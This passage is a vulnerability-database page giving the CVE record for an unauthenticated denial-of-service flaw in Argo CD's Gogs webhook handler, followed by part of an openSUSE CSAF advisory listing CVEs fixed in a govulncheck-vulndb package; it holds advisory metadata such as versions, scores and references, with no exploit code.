Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-59537 (GCVE-0-2025-59537)
Vulnerability from cvelistv5 – Published: 2025-10-01 21:01 – Updated: 2025-10-02 15:54
VLAI?
EPSS
Summary
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions 1.2.0 through 1.8.7, 2.0.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.7 and 3.0.18 are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. With the default configuration, no webhook.gogs.secret set, Argo CD’s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.
Severity ?
7.5 (High)
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-59537",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-02T15:35:13.081671Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-02T15:54:17.919Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "argo-cd",
"vendor": "argoproj",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.2.0, \u003c= 1.8.7"
},
{
"status": "affected",
"version": "\u003e= 2.0.0-rc1, \u003c 2.14.20"
},
{
"status": "affected",
"version": "\u003e= 3.2.0-rc1, \u003c 3.2.0-rc2"
},
{
"status": "affected",
"version": "\u003e= 3.1.0-rc1, \u003c 3.1.8"
},
{
"status": "affected",
"version": "\u003e= 3.0.0-rc1, \u003c 3.0.19"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions 1.2.0 through 1.8.7, 2.0.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.7 and 3.0.18 are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. With the default configuration, no webhook.gogs.secret set, Argo CD\u2019s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20: Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476: NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-01T21:01:36.519Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2"
},
{
"name": "https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43"
}
],
"source": {
"advisory": "GHSA-wp4p-9pxh-cgx2",
"discovery": "UNKNOWN"
},
"title": "argo-cd is vulnerable to unauthenticated DoS attack via malformed Gogs webhook payload"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-59537",
"datePublished": "2025-10-01T21:01:36.519Z",
"dateReserved": "2025-09-17T17:04:20.373Z",
"dateUpdated": "2025-10-02T15:54:17.919Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-59537\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-10-01T21:16:43.577\",\"lastModified\":\"2025-10-07T14:34:45.730\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions 1.2.0 through 1.8.7, 2.0.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.7 and 3.0.18 are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. With the default configuration, no webhook.gogs.secret set, Argo CD\u2019s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"},{\"lang\":\"en\",\"value\":\"CWE-476\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-476\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"1.2.0\",\"versionEndIncluding\":\"1.8.7\",\"matchCriteriaId\":\"CDA16487-4630-4646-9952-32E096B64251\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.0.0\",\"versionEndExcluding\":\"2.14.20\",\"matchCriteriaId\":\"FD4B38D5-4CEC-4C24-AD81-92B9DA4426AC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.0.0\",\"versionEndExcluding\":\"3.0.19\",\"matchCriteriaId\":\"E7FEAEBF-40B8-40E4-B34B-2785B0FEAFEB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.1.0\",\"versionEndExcluding\":\"3.1.8\",\"matchCriteriaId\":\"AFF4E847-D3D6-457A-A47B-98799D28E20E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:argoproj:argo_cd:3.2.0:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"247C0721-E494-4732-BF53-F249C574A702\"}]}]}],\"references\":[{\"url\":\"https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\",\"Mitigation\"]},{\"url\":\"https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\",\"Mitigation\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-59537\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-10-02T15:35:13.081671Z\"}}}], \"references\": [{\"url\": \"https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-10-02T15:35:20.301Z\"}}], \"cna\": {\"title\": \"argo-cd is vulnerable to unauthenticated DoS attack via malformed Gogs webhook payload\", \"source\": {\"advisory\": \"GHSA-wp4p-9pxh-cgx2\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"argoproj\", \"product\": \"argo-cd\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.2.0, \u003c= 1.8.7\"}, {\"status\": \"affected\", \"version\": \"\u003e= 2.0.0-rc1, \u003c 2.14.20\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.2.0-rc1, \u003c 3.2.0-rc2\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.1.0-rc1, \u003c 3.1.8\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.0.0-rc1, \u003c 3.0.19\"}]}], \"references\": [{\"url\": \"https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2\", \"name\": \"https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43\", \"name\": \"https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions 1.2.0 through 1.8.7, 2.0.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.7 and 3.0.18 are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. With the default configuration, no webhook.gogs.secret set, Argo CD\\u2019s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-20\", \"description\": \"CWE-20: Improper Input Validation\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-476\", \"description\": \"CWE-476: NULL Pointer Dereference\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-10-01T21:01:36.519Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-59537\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-10-02T15:54:17.919Z\", \"dateReserved\": \"2025-09-17T17:04:20.373Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-10-01T21:01:36.519Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
OPENSUSE-SU-2025:15666-1
Vulnerability from csaf_opensuse - Published: 2025-10-24 00:00 - Updated: 2025-10-24 00:00Summary
govulncheck-vulndb-0.0.20251023T162509-1.1 on GA media
Notes
Title of the patch
govulncheck-vulndb-0.0.20251023T162509-1.1 on GA media
Description of the patch
These are all security issues fixed in the govulncheck-vulndb-0.0.20251023T162509-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2025-15666
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "govulncheck-vulndb-0.0.20251023T162509-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the govulncheck-vulndb-0.0.20251023T162509-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15666",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15666-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-58260 page",
"url": "https://www.suse.com/security/cve/CVE-2024-58260/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-58267 page",
"url": "https://www.suse.com/security/cve/CVE-2024-58267/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-23266 page",
"url": "https://www.suse.com/security/cve/CVE-2025-23266/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-23267 page",
"url": "https://www.suse.com/security/cve/CVE-2025-23267/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54468 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54468/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55191 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55191/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59163 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59163/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59531 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59531/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59537 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59537/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59538 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59538/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59823 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59823/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59824 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59824/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59941 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59941/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59942 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59942/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59956 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59956/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-61595 page",
"url": "https://www.suse.com/security/cve/CVE-2025-61595/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-61926 page",
"url": "https://www.suse.com/security/cve/CVE-2025-61926/"
}
],
"title": "govulncheck-vulndb-0.0.20251023T162509-1.1 on GA media",
"tracking": {
"current_release_date": "2025-10-24T00:00:00Z",
"generator": {
"date": "2025-10-24T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15666-1",
"initial_release_date": "2025-10-24T00:00:00Z",
"revision_history": [
{
"date": "2025-10-24T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"product": {
"name": "govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"product_id": "govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"product": {
"name": "govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"product_id": "govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"product": {
"name": "govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"product_id": "govulncheck-vulndb-0.0.20251023T162509-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64",
"product": {
"name": "govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64",
"product_id": "govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64"
},
"product_reference": "govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le"
},
"product_reference": "govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20251023T162509-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x"
},
"product_reference": "govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
},
"product_reference": "govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-58260",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-58260"
}
],
"notes": [
{
"category": "general",
"text": "A vulnerability has been identified within Rancher Manager where a missing server-side validation on the `.username` field in Rancher can allow users with update permissions on other User resources to cause denial of access for targeted accounts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-58260",
"url": "https://www.suse.com/security/cve/CVE-2024-58260"
},
{
"category": "external",
"summary": "SUSE Bug 1246840 for CVE-2024-58260",
"url": "https://bugzilla.suse.com/1246840"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2024-58260"
},
{
"cve": "CVE-2024-58267",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-58267"
}
],
"notes": [
{
"category": "general",
"text": "A vulnerability has been identified within Rancher Manager whereby the SAML authentication from the Rancher CLI tool is vulnerable to phishing attacks. The custom authentication protocol for SAML-based providers can be abused to steal Rancher\u0027s authentication tokens.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-58267",
"url": "https://www.suse.com/security/cve/CVE-2024-58267"
},
{
"category": "external",
"summary": "SUSE Bug 1249100 for CVE-2024-58267",
"url": "https://bugzilla.suse.com/1249100"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2024-58267"
},
{
"cve": "CVE-2025-23266",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-23266"
}
],
"notes": [
{
"category": "general",
"text": "NVIDIA Container Toolkit for all platforms contains a vulnerability in some hooks used to initialize the container, where an attacker could execute arbitrary code with elevated permissions. A successful exploit of this vulnerability might lead to escalation of privileges, data tampering, information disclosure, and denial of service.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-23266",
"url": "https://www.suse.com/security/cve/CVE-2025-23266"
},
{
"category": "external",
"summary": "SUSE Bug 1246860 for CVE-2025-23266",
"url": "https://bugzilla.suse.com/1246860"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-23266"
},
{
"cve": "CVE-2025-23267",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-23267"
}
],
"notes": [
{
"category": "general",
"text": "NVIDIA Container Toolkit for all platforms contains a vulnerability in the update-ldcache hook, where an attacker could cause a link following by using a specially crafted container image. A successful exploit of this vulnerability might lead to data tampering and denial of service.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-23267",
"url": "https://www.suse.com/security/cve/CVE-2025-23267"
},
{
"category": "external",
"summary": "SUSE Bug 1246614 for CVE-2025-23267",
"url": "https://bugzilla.suse.com/1246614"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-23267"
},
{
"cve": "CVE-2025-54468",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54468"
}
],
"notes": [
{
"category": "general",
"text": "A vulnerability has been identified within Rancher Manager whereby `Impersonate-Extra-*` headers are being sent to an external entity, for example `amazonaws.com`, via the `/meta/proxy` Rancher endpoint. These headers may contain identifiable and/or sensitive information e.g. email addresses.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251023T162509-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54468",
